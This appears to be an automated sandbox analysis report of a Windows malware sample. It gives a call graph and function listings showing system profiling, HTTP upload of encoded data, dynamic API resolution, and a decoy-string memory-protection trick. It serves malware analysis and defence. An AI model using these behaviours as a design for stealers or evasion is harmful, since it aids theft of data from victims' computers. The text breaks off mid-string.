15170 682279 15169->15170 15749 688100 GetProcessHeap RtlAllocateHeap 15170->15749 15173 68a9b0 4 API calls 15174 682299 15173->15174 15175 68a8a0 lstrcpy 15174->15175 15176 6822a2 15175->15176 15177 68a9b0 4 API calls 15176->15177 15178 6822c1 15177->15178 15179 68a8a0 lstrcpy 15178->15179 15180 6822ca 15179->15180 15181 68a9b0 4 API calls 15180->15181 15182 6822eb 15181->15182 15183 68a8a0 lstrcpy 15182->15183 15184 6822f4 15183->15184 15755 6887c0 15184->15755 15187 68a920 3 API calls 15188 68231e 15187->15188 15189 68a8a0 lstrcpy 15188->15189 15190 682327 15189->15190 15191 68a9b0 4 API calls 15190->15191 15192 682351 15191->15192 15193 68a8a0 lstrcpy 15192->15193 15194 68235a 15193->15194 15195 68a9b0 4 API calls 15194->15195 15196 68237a 15195->15196 15197 68a8a0 lstrcpy 15196->15197 15198 682383 15197->15198 15199 68a9b0 4 API calls 15198->15199 15200 6823a2 15199->15200 15201 68a8a0 lstrcpy 15200->15201 15202 6823ab 15201->15202 15760 6881f0 15202->15760 15204 6823c2 15205 68a920 3 API calls 15204->15205 15206 6823d5 15205->15206 15207 68a8a0 lstrcpy 15206->15207 15208 6823de 15207->15208 15209 68a9b0 4 API calls 15208->15209 15210 68240a 15209->15210 15211 68a8a0 lstrcpy 15210->15211 15212 682413 15211->15212 15213 68a9b0 4 API calls 15212->15213 15214 682432 15213->15214 15215 68a8a0 lstrcpy 15214->15215 15216 68243b 15215->15216 15217 68a9b0 4 API calls 15216->15217 15218 68245c 15217->15218 15219 68a8a0 lstrcpy 15218->15219 15220 682465 15219->15220 15221 68a9b0 4 API calls 15220->15221 15222 682484 15221->15222 15223 68a8a0 lstrcpy 15222->15223 15224 68248d 15223->15224 15225 68a9b0 4 API calls 15224->15225 15226 6824ae 15225->15226 15227 68a8a0 lstrcpy 15226->15227 15228 6824b7 15227->15228 15768 688320 15228->15768 15230 6824d3 15231 68a920 3 API calls 15230->15231 15232 6824e6 15231->15232 15233 68a8a0 lstrcpy 15232->15233 15234 6824ef 15233->15234 15235 68a9b0 4 API calls 15234->15235 15236 682519 15235->15236 15237 68a8a0 lstrcpy 15236->15237 15238 682522 15237->15238 15239 68a9b0 4 API calls 15238->15239 15240 682543 15239->15240 15241 68a8a0 lstrcpy 15240->15241 15242 68254c 15241->15242 15243 688320 17 API calls 15242->15243 15244 682568 15243->15244 15245 68a920 3 API calls 15244->15245 15246 68257b 15245->15246 15247 68a8a0 lstrcpy 15246->15247 15248 682584 15247->15248 15249 68a9b0 4 API calls 15248->15249 15250 6825ae 15249->15250 15251 68a8a0 lstrcpy 15250->15251 15252 6825b7 15251->15252 15253 68a9b0 4 API calls 15252->15253 15254 6825d6 15253->15254 15255 68a8a0 lstrcpy 15254->15255 15256 6825df 15255->15256 15257 68a9b0 4 API calls 15256->15257 15258 682600 15257->15258 15259 68a8a0 lstrcpy 15258->15259 15260 682609 15259->15260 15804 688680 15260->15804 15262 682620 15263 68a920 3 API calls 15262->15263 15264 682633 15263->15264 15265 68a8a0 lstrcpy 15264->15265 15266 68263c 15265->15266 15267 68265a lstrlen 15266->15267 15268 68266a 15267->15268 15269 68a740 lstrcpy 15268->15269 15270 68267c 15269->15270 15271 671590 lstrcpy 15270->15271 15272 68268d 15271->15272 15814 685190 15272->15814 15274 682699 15274->13706 16002 68aad0 15275->16002 15277 675009 InternetOpenUrlA 15278 675021 15277->15278 15279 6750a0 InternetCloseHandle InternetCloseHandle 15278->15279 15280 67502a InternetReadFile 15278->15280 15281 6750ec 15279->15281 15280->15278 15281->13710 16003 6798d0 15282->16003 15284 680759 15285 680a38 15284->15285 15286 68077d 15284->15286 15287 671590 lstrcpy 15285->15287 15289 680799 StrCmpCA 15286->15289 15288 680a49 15287->15288 16179 680250 15288->16179 15291 6807a8 15289->15291 15292 680843 15289->15292 15294 68a7a0 lstrcpy 15291->15294 15295 680865 StrCmpCA 15292->15295 15296 6807c3 15294->15296 15297 680874 15295->15297 15334 68096b 15295->15334 15298 671590 lstrcpy 15296->15298 15299 68a740 lstrcpy 15297->15299 15300 68080c 15298->15300 15302 680881 15299->15302 15303 68a7a0 lstrcpy 15300->15303 15301 68099c StrCmpCA 15304 6809ab 15301->15304 15305 680a2d 15301->15305 15306 68a9b0 4 API calls 15302->15306 15307 680823 15303->15307 15308 671590 lstrcpy 15304->15308 15305->13714 15309 6808ac 15306->15309 15310 68a7a0 lstrcpy 15307->15310 15311 6809f4 15308->15311 15312 68a920 3 API calls 15309->15312 15313 68083e 15310->15313 15315 68a7a0 lstrcpy 15311->15315 15316 6808b3 15312->15316 16006 67fb00 15313->16006 15317 680a0d 15315->15317 15318 68a9b0 4 API calls 15316->15318 15319 68a7a0 lstrcpy 15317->15319 15320 6808ba 15318->15320 15321 680a28 15319->15321 15322 68a8a0 lstrcpy 15320->15322 15334->15301 15654 68a7a0 lstrcpy 15653->15654 15655 671683 15654->15655 15656 68a7a0 lstrcpy 15655->15656 15657 671695 15656->15657 15658 68a7a0 lstrcpy 15657->15658 15659 6716a7 15658->15659 15660 68a7a0 lstrcpy 15659->15660 15661 6715a3 15660->15661 15661->14537 15663 6747c6 15662->15663 15664 674838 lstrlen 15663->15664 15688 68aad0 15664->15688 15666 674848 InternetCrackUrlA 15667 674867 15666->15667 15667->14614 15669 68a740 lstrcpy 15668->15669 15670 688b74 15669->15670 15671 68a740 lstrcpy 15670->15671 15672 688b82 GetSystemTime 15671->15672 15674 688b99 15672->15674 15673 68a7a0 lstrcpy 15675 688bfc 15673->15675 15674->15673 15675->14629 15677 68a931 15676->15677 15678 68a988 15677->15678 15680 68a968 lstrcpy lstrcat 15677->15680 15679 68a7a0 lstrcpy 15678->15679 15681 68a994 15679->15681 15680->15678 15681->14632 15682->14747 15684 674eee 15683->15684 15685 679af9 LocalAlloc 15683->15685 15684->14635 15684->14638 15685->15684 15686 679b14 CryptStringToBinaryA 15685->15686 15686->15684 15687 679b39 LocalFree 15686->15687 15687->15684 15688->15666 15689->14757 15690->14898 15691->14900 15692->14908 15821 6877a0 15693->15821 15696 681c1e 15696->14990 15697 6876c6 RegOpenKeyExA 15698 687704 RegCloseKey 15697->15698 15699 6876e7 RegQueryValueExA 15697->15699 15698->15696 15699->15698 15701 681c99 15700->15701 15701->15004 15703 681e09 15702->15703 15703->15046 15705 687a9a wsprintfA 15704->15705 15706 681e84 15704->15706 15705->15706 15706->15060 15708 687b4d 15707->15708 15709 681efe 15707->15709 15828 688d20 LocalAlloc CharToOemW 15708->15828 15709->15074 15712 68a740 lstrcpy 15711->15712 15713 687bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15712->15713 15722 687c25 15713->15722 15714 687d18 15716 687d28 15714->15716 15717 687d1e LocalFree 15714->15717 15715 687c46 GetLocaleInfoA 15715->15722 15719 68a7a0 lstrcpy 15716->15719 15717->15716 15718 68a9b0 lstrcpy lstrlen lstrcpy lstrcat 15718->15722 15721 687d37 15719->15721 15720 68a8a0 lstrcpy 15720->15722 15721->15087 15722->15714 15722->15715 15722->15718 15722->15720 15724 682008 15723->15724 15724->15102 15726 689493 GetModuleFileNameExA CloseHandle 15725->15726 15727 6894b5 15725->15727 15726->15727 15728 68a740 lstrcpy 15727->15728 15729 682091 15728->15729 15729->15117 15731 687e68 RegQueryValueExA 15730->15731 15732 682119 15730->15732 15733 687e8e RegCloseKey 15731->15733 15732->15131 15733->15732 15735 687fb9 GetLogicalProcessorInformationEx 15734->15735 15736 687fd8 GetLastError 15735->15736 15738 688029 15735->15738 15743 687fe3 15736->15743 15746 688022 15736->15746 15737 682194 15737->15145 15742 6889f0 2 API calls 15738->15742 15741 6889f0 2 API calls 15741->15737 15744 68807b 15742->15744 15743->15735 15743->15737 15829 6889f0 15743->15829 15832 688a10 GetProcessHeap RtlAllocateHeap 15743->15832 15745 688084 wsprintfA 15744->15745 15744->15746 15745->15737 15746->15737 15746->15741 15748 68220f 15747->15748 15748->15159 15750 6889b0 15749->15750 15751 68814d GlobalMemoryStatusEx 15750->15751 15752 688163 __aulldiv 15751->15752 15753 68819b wsprintfA 15752->15753 15754 682289 15753->15754 15754->15173 15756 6887fb GetProcessHeap RtlAllocateHeap wsprintfA 15755->15756 15758 68a740 lstrcpy 15756->15758 15759 68230b 15758->15759 15759->15187 15761 68a740 lstrcpy 15760->15761 15763 688229 15761->15763 15762 688263 15764 68a7a0 lstrcpy 15762->15764 15763->15762 15766 68a9b0 lstrcpy lstrlen lstrcpy lstrcat 15763->15766 15767 68a8a0 lstrcpy 15763->15767 15765 6882dc 15764->15765 15765->15204 15766->15763 15767->15763 15769 68a740 lstrcpy 15768->15769 15770 68835c RegOpenKeyExA 15769->15770 15771 6883ae 15770->15771 15772 6883d0 15770->15772 15773 68a7a0 lstrcpy 15771->15773 15774 6883f8 RegEnumKeyExA 15772->15774 15775 688613 RegCloseKey 15772->15775 15785 6883bd 15773->15785 15776 68860e 15774->15776 15777 68843f wsprintfA RegOpenKeyExA 15774->15777 15778 68a7a0 lstrcpy 15775->15778 15776->15775 15779 6884c1 RegQueryValueExA 15777->15779 15780 688485 RegCloseKey RegCloseKey 15777->15780 15778->15785 15782 6884fa lstrlen 15779->15782 15783 688601 RegCloseKey 15779->15783 15781 68a7a0 lstrcpy 15780->15781 15781->15785 15782->15783 15784 688510 15782->15784 15783->15776 15786 68a9b0 4 API calls 15784->15786 15785->15230 15787 688527 15786->15787 15788 68a8a0 lstrcpy 15787->15788 15789 688533 15788->15789 15790 68a9b0 4 API calls 15789->15790 15791 688557 15790->15791 15792 68a8a0 lstrcpy 15791->15792 15793 688563 15792->15793 15794 68856e RegQueryValueExA 15793->15794 15794->15783 15795 6885a3 15794->15795 15796 68a9b0 4 API calls 15795->15796 15797 6885ba 15796->15797 15798 68a8a0 lstrcpy 15797->15798 15799 6885c6 15798->15799 15800 68a9b0 4 API calls 15799->15800 15801 6885ea 15800->15801 15802 68a8a0 lstrcpy 15801->15802 15803 6885f6 15802->15803 15803->15783 15805 68a740 lstrcpy 15804->15805 15806 6886bc CreateToolhelp32Snapshot Process32First 15805->15806 15807 6886e8 Process32Next 15806->15807 15808 68875d CloseHandle 15806->15808 15807->15808 15813 6886fd 15807->15813 15809 68a7a0 lstrcpy 15808->15809 15811 688776 15809->15811 15810 68a8a0 lstrcpy 15810->15813 15811->15262 15812 68a9b0 lstrcpy lstrlen lstrcpy lstrcat 15812->15813 15813->15807 15813->15810 15813->15812 15815 68a7a0 lstrcpy 15814->15815 15816 6851b5 15815->15816 15817 671590 lstrcpy 15816->15817 15818 6851c6 15817->15818 15833 675100 15818->15833 15820 6851cf 15820->15274 15824 687720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15821->15824 15823 6876b9 15823->15696 15823->15697 15825 687780 RegCloseKey 15824->15825 15826 687765 RegQueryValueExA 15824->15826 15827 687793 15825->15827 15826->15825 15827->15823 15828->15709 15830 6889f9 GetProcessHeap HeapFree 15829->15830 15831 688a0c 15829->15831 15830->15831 15831->15743 15832->15743 15834 68a7a0 lstrcpy 15833->15834 15835 675119 15834->15835 15836 6747b0 2 API calls 15835->15836 15837 675125 15836->15837 15993 688ea0 15837->15993 15839 675184 15840 675192 lstrlen 15839->15840 15841 6751a5 15840->15841 15842 688ea0 4 API calls 15841->15842 15843 6751b6 15842->15843 15844 68a740 lstrcpy 15843->15844 15845 6751c9 15844->15845 15846 68a740 lstrcpy 15845->15846 15847 6751d6 15846->15847 15848 68a740 lstrcpy 15847->15848 15849 6751e3 15848->15849 15850 68a740 lstrcpy 15849->15850 15851 6751f0 15850->15851 15852 68a740 lstrcpy 15851->15852 15853 6751fd InternetOpenA StrCmpCA 15852->15853 15854 67522f 15853->15854 15855 6758c4 InternetCloseHandle 15854->15855 15856 688b60 3 API calls 15854->15856 15862 6758d9 codecvt 15855->15862 15857 67524e 15856->15857 15858 68a920 3 API calls 15857->15858 15859 675261 15858->15859 15860 68a8a0 lstrcpy 15859->15860 15861 67526a 15860->15861 15863 68a9b0 4 API calls 15861->15863 15866 68a7a0 lstrcpy 15862->15866 15864 6752ab 15863->15864 15865 68a920 3 API calls 15864->15865 15867 6752b2 15865->15867 15874 675913 15866->15874 15868 68a9b0 4 API calls 15867->15868 15869 6752b9 15868->15869 15870 68a8a0 lstrcpy 15869->15870 15871 6752c2 15870->15871 15872 68a9b0 4 API calls 15871->15872 15873 675303 15872->15873 15875 68a920 3 API calls 15873->15875 15874->15820 15876 67530a 15875->15876 15877 68a8a0 lstrcpy 15876->15877 15878 675313 15877->15878 15879 675329 InternetConnectA 15878->15879 15879->15855 15880 675359 HttpOpenRequestA 15879->15880 15882 6758b7 InternetCloseHandle 15880->15882 15883 6753b7 15880->15883 15882->15855 15884 68a9b0 4 API calls 15883->15884 15885 6753cb 15884->15885 15886 68a8a0 lstrcpy 15885->15886 15887 6753d4 15886->15887 15888 68a920 3 API calls 15887->15888 15889 6753f2 15888->15889 15890 68a8a0 lstrcpy 15889->15890 15891 6753fb 15890->15891 15892 68a9b0 4 API calls 15891->15892 15893 67541a 15892->15893 15894 68a8a0 lstrcpy 15893->15894 15895 675423 15894->15895 15896 68a9b0 4 API calls 15895->15896 15897 675444 15896->15897 15898 68a8a0 lstrcpy 15897->15898 15899 67544d 15898->15899 15900 68a9b0 4 API calls 15899->15900 15901 67546e 15900->15901 15994 688ead CryptBinaryToStringA 15993->15994 15995 688ea9 15993->15995 15994->15995 15996 688ece GetProcessHeap RtlAllocateHeap 15994->15996 15995->15839 15996->15995 15997 688ef4 codecvt 15996->15997 15998 688f05 CryptBinaryToStringA 15997->15998 15998->15995 16002->15277 16245 679880 16003->16245 16005 6798e1 16005->15284 16007 68a740 lstrcpy 16006->16007 16008 67fb16 16007->16008 16180 68a740 lstrcpy 16179->16180 16181 680266 16180->16181 16182 688de0 2 API calls 16181->16182 16183 68027b 16182->16183 16184 68a920 3 API calls 16183->16184 16185 68028b 16184->16185 16186 68a8a0 lstrcpy 16185->16186 16187 680294 16186->16187 16188 68a9b0 4 API calls 16187->16188 16246 67988e 16245->16246 16249 676fb0 16246->16249 16248 6798ad codecvt 16248->16005 16252 676d40 16249->16252 16253 676d63 16252->16253 16262 676d59 16252->16262 16268 676530 16253->16268 16257 676dbe 16257->16262 16278 6769b0 16257->16278 16259 676e2a 16260 676ee6 VirtualFree 16259->16260 16259->16262 16263 676ef7 16259->16263 16260->16263 16261 676f41 16261->16262 16264 6889f0 2 API calls 16261->16264 16262->16248 16263->16261 16265 676f26 FreeLibrary 16263->16265 16266 676f38 16263->16266 16264->16262 16265->16263 16267 6889f0 2 API calls 16266->16267 16267->16261 16269 676542 16268->16269 16271 676549 16269->16271 16288 688a10 GetProcessHeap RtlAllocateHeap 16269->16288 16271->16262 16272 676660 16271->16272 16275 67668f VirtualAlloc 16272->16275 16274 676730 16276 676743 VirtualAlloc 16274->16276 16277 67673c 16274->16277 16275->16274 16275->16277 16276->16277 16277->16257 16279 6769c9 16278->16279 16283 6769d5 16278->16283 16280 676a09 LoadLibraryA 16279->16280 16279->16283 16281 676a32 16280->16281 16280->16283 16285 676ae0 16281->16285 16289 688a10 GetProcessHeap RtlAllocateHeap 16281->16289 16283->16259 16284 676ba8 GetProcAddress 16284->16283 16284->16285 16285->16283 16285->16284 16286 6889f0 2 API calls 16286->16285 16287 676a8b 16287->16283 16287->16286 16288->16271 16289->16287

                            Executed Functions

                            Function 00689860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 689860-689874 call 689750 663 68987a-689a8e call 689780 GetProcAddress * 21 660->663 664 689a93-689af2 LoadLibraryA * 5 660->664 663->664 666 689b0d-689b14 664->666 667 689af4-689b08 GetProcAddress 664->667 669 689b46-689b4d 666->669 670 689b16-689b41 GetProcAddress * 2 666->670 667->666 671 689b68-689b6f 669->671 672 689b4f-689b63 GetProcAddress 669->672 670->669 673 689b89-689b90 671->673 674 689b71-689b84 GetProcAddress 671->674 672->671 675 689bc1-689bc2 673->675 676 689b92-689bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(77190000,012B1630), ref: 006898A1
                            • GetProcAddress.KERNEL32(77190000,012B15E8), ref: 006898BA
                            • GetProcAddress.KERNEL32(77190000,012B1648), ref: 006898D2
                            • GetProcAddress.KERNEL32(77190000,012B1678), ref: 006898EA
                            • GetProcAddress.KERNEL32(77190000,012B1528), ref: 00689903
                            • GetProcAddress.KERNEL32(77190000,012B8A68), ref: 0068991B
                            • GetProcAddress.KERNEL32(77190000,012A5588), ref: 00689933
                            • GetProcAddress.KERNEL32(77190000,012A54C8), ref: 0068994C
                            • GetProcAddress.KERNEL32(77190000,012B1690), ref: 00689964
                            • GetProcAddress.KERNEL32(77190000,012B16A8), ref: 0068997C
                            • GetProcAddress.KERNEL32(77190000,012B17C8), ref: 00689995
                            • GetProcAddress.KERNEL32(77190000,012B16D8), ref: 006899AD
                            • GetProcAddress.KERNEL32(77190000,012A56A8), ref: 006899C5
                            • GetProcAddress.KERNEL32(77190000,012B16F0), ref: 006899DE
                            • GetProcAddress.KERNEL32(77190000,012B17E0), ref: 006899F6
                            • GetProcAddress.KERNEL32(77190000,012A53E8), ref: 00689A0E
                            • GetProcAddress.KERNEL32(77190000,012B1738), ref: 00689A27
                            • GetProcAddress.KERNEL32(77190000,012B14F8), ref: 00689A3F
                            • GetProcAddress.KERNEL32(77190000,012A5508), ref: 00689A57
                            • GetProcAddress.KERNEL32(77190000,012B1870), ref: 00689A70
                            • GetProcAddress.KERNEL32(77190000,012A56C8), ref: 00689A88
                            • LoadLibraryA.KERNEL32(012B18B8,?,00686A00), ref: 00689A9A
                            • LoadLibraryA.KERNEL32(012B18A0,?,00686A00), ref: 00689AAB
                            • LoadLibraryA.KERNEL32(012B1858,?,00686A00), ref: 00689ABD
                            • LoadLibraryA.KERNEL32(012B1828,?,00686A00), ref: 00689ACF
                            • LoadLibraryA.KERNEL32(012B1888,?,00686A00), ref: 00689AE0
                            • GetProcAddress.KERNEL32(76850000,012B17F8), ref: 00689B02
                            • GetProcAddress.KERNEL32(77040000,012B1810), ref: 00689B23
                            • GetProcAddress.KERNEL32(77040000,012B1840), ref: 00689B3B
                            • GetProcAddress.KERNEL32(75A10000,012B9068), ref: 00689B5D
                            • GetProcAddress.KERNEL32(75690000,012A53C8), ref: 00689B7E
                            • GetProcAddress.KERNEL32(776F0000,012B8A48), ref: 00689B9F
                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00689BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00689BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: f53d8814f2569a682390e1abf0e22acac84d46a38cbdc725f800bd66523d74c9
                            • Instruction ID: 78309bd6c08e393ee3e91103abc583e7ebee967f537d0cf774e0c11139bb6cc6
                            • Opcode Fuzzy Hash: f53d8814f2569a682390e1abf0e22acac84d46a38cbdc725f800bd66523d74c9
                            • Instruction Fuzzy Hash: FCA19FB5508640AFC35CEFA8FD889663BF9F74C301754472AE659C3634DB3A9841CB2A
                            Function 006745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 6745c0-674695 RtlAllocateHeap 781 6746a0-6746a6 764->781 782 67474f-6747a9 VirtualProtect 781->782 783 6746ac-67474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0067460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0067479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006745F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006746D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006746AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006745E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006746B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006745C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006746CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006745D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00674678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0067474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006745DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006746C2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo 